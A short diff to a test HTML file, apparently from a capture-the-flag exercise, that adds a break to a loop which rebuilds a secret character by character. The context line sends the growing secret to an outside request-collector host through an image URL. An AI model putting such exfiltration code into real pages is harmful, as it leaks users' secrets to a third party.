--- a/static/js/test.html
+++ b/static/js/test.html
@@ -36,6 +36,7 @@
                     secret += rslt.char;
                     found = true;
                     img.src = `https://xwdymwe.request.dreamhack.games/${secret}`;
+                    break;
                 }
             }
         }
